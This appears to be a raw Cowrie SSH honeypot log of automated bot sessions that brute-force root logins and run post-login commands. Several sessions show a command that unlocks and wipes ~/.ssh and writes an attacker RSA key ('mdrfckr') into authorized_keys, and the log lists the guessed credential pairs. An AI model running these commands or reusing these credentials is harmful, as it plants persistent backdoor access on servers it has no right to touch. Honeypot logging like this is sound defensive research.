{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":33292,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fa58f310e76","protocol":"ssh","message":"New connection: 213.6.203.226:33292 (1.2.3.4:22) [session: 5fa58f310e76]","sensor":"my-vps","timestamp":"2025-09-09T05:44:20.630244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:44:20.631161Z","src_ip":"213.6.203.226","session":"5fa58f310e76"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:44:20.698256Z","src_ip":"213.6.203.226","session":"5fa58f310e76"}
{"eventid":"cowrie.login.success","username":"root","password":"Newpassword","message":"login attempt [root/Newpassword] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:44:21.015850Z","src_ip":"213.6.203.226","session":"5fa58f310e76"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:44:21.232857Z","src_ip":"213.6.203.226","session":"5fa58f310e76"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:44:21.233565Z","src_ip":"213.6.203.226","session":"5fa58f310e76"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:44:21.234848Z","src_ip":"213.6.203.226","session":"5fa58f310e76"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:21.304795Z","src_ip":"213.6.203.226","session":"5fa58f310e76"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:44:21.501902Z","src_ip":"213.6.203.226","session":"5fa58f310e76"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:44:21.502641Z","src_ip":"213.6.203.226","session":"5fa58f310e76"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:44:21.572280Z","src_ip":"213.6.203.226","session":"5fa58f310e76"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:21.573157Z","src_ip":"213.6.203.226","session":"5fa58f310e76"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":60355,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3e2fab84446","protocol":"ssh","message":"New connection: 213.6.203.226:60355 (1.2.3.4:22) [session: a3e2fab84446]","sensor":"my-vps","timestamp":"2025-09-09T05:44:21.639316Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:44:21.639914Z","src_ip":"213.6.203.226","session":"a3e2fab84446"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:44:21.708110Z","src_ip":"213.6.203.226","session":"a3e2fab84446"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:44:22.021351Z","src_ip":"213.6.203.226","session":"a3e2fab84446"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:23.091871Z","src_ip":"213.6.203.226","session":"a3e2fab84446"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":62141,"dst_ip":"1.2.3.4","dst_port":22,"session":"689060f23c37","protocol":"ssh","message":"New connection: 213.6.203.226:62141 (1.2.3.4:22) [session: 689060f23c37]","sensor":"my-vps","timestamp":"2025-09-09T05:44:23.162815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:44:23.163684Z","src_ip":"213.6.203.226","session":"689060f23c37"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:44:23.231523Z","src_ip":"213.6.203.226","session":"689060f23c37"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:44:23.546140Z","src_ip":"213.6.203.226","session":"689060f23c37"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:23.614603Z","src_ip":"213.6.203.226","session":"5fa58f310e76"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:23.616221Z","src_ip":"213.6.203.226","session":"689060f23c37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59251,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5dc3aaf576a","protocol":"ssh","message":"New connection: 212.227.235.229:59251 (1.2.3.4:22) [session: b5dc3aaf576a]","sensor":"my-vps","timestamp":"2025-09-09T05:44:26.865832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:44:26.866733Z","src_ip":"212.227.235.229","session":"b5dc3aaf576a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:44:27.122357Z","src_ip":"212.227.235.229","session":"b5dc3aaf576a"}
{"eventid":"cowrie.login.success","username":"root","password":"Master@2025","message":"login attempt [root/Master@2025] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:44:28.185685Z","src_ip":"212.227.235.229","session":"b5dc3aaf576a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:44:28.713306Z","src_ip":"212.227.235.229","session":"b5dc3aaf576a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:44:28.713951Z","src_ip":"212.227.235.229","session":"b5dc3aaf576a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:44:28.714808Z","src_ip":"212.227.235.229","session":"b5dc3aaf576a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:28.971896Z","src_ip":"212.227.235.229","session":"b5dc3aaf576a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:44:29.599130Z","src_ip":"212.227.235.229","session":"b5dc3aaf576a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:44:29.599594Z","src_ip":"212.227.235.229","session":"b5dc3aaf576a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:44:29.857575Z","src_ip":"212.227.235.229","session":"b5dc3aaf576a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:29.858533Z","src_ip":"212.227.235.229","session":"b5dc3aaf576a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59620,"dst_ip":"1.2.3.4","dst_port":22,"session":"93787a848f7e","protocol":"ssh","message":"New connection: 212.227.235.229:59620 (1.2.3.4:22) [session: 93787a848f7e]","sensor":"my-vps","timestamp":"2025-09-09T05:44:30.108831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:44:30.109568Z","src_ip":"212.227.235.229","session":"93787a848f7e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:44:30.362904Z","src_ip":"212.227.235.229","session":"93787a848f7e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:44:31.411697Z","src_ip":"212.227.235.229","session":"93787a848f7e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:32.664566Z","src_ip":"212.227.235.229","session":"93787a848f7e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59941,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc3a7ca3ded9","protocol":"ssh","message":"New connection: 212.227.235.229:59941 (1.2.3.4:22) [session: cc3a7ca3ded9]","sensor":"my-vps","timestamp":"2025-09-09T05:44:32.934990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:44:32.935647Z","src_ip":"212.227.235.229","session":"cc3a7ca3ded9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32796,"dst_ip":"1.2.3.4","dst_port":22,"session":"a72fcb816138","protocol":"ssh","message":"New connection: 212.227.235.229:32796 (1.2.3.4:22) [session: a72fcb816138]","sensor":"my-vps","timestamp":"2025-09-09T05:44:32.973195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:44:32.977948Z","src_ip":"212.227.235.229","session":"a72fcb816138"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:44:33.150819Z","src_ip":"212.227.235.229","session":"a72fcb816138"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:44:33.954706Z","src_ip":"212.227.235.229","session":"cc3a7ca3ded9"}
{"eventid":"cowrie.login.success","username":"root","password":"3edc$RFV","message":"login attempt [root/3edc$RFV] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:44:34.416130Z","src_ip":"212.227.235.229","session":"a72fcb816138"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:44:34.833881Z","src_ip":"212.227.235.229","session":"a72fcb816138"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:44:34.834633Z","src_ip":"212.227.235.229","session":"a72fcb816138"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:44:34.835726Z","src_ip":"212.227.235.229","session":"a72fcb816138"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:35.010477Z","src_ip":"212.227.235.229","session":"a72fcb816138"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:44:35.107069Z","src_ip":"212.227.235.229","session":"cc3a7ca3ded9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:44:35.374563Z","src_ip":"212.227.235.229","session":"a72fcb816138"}
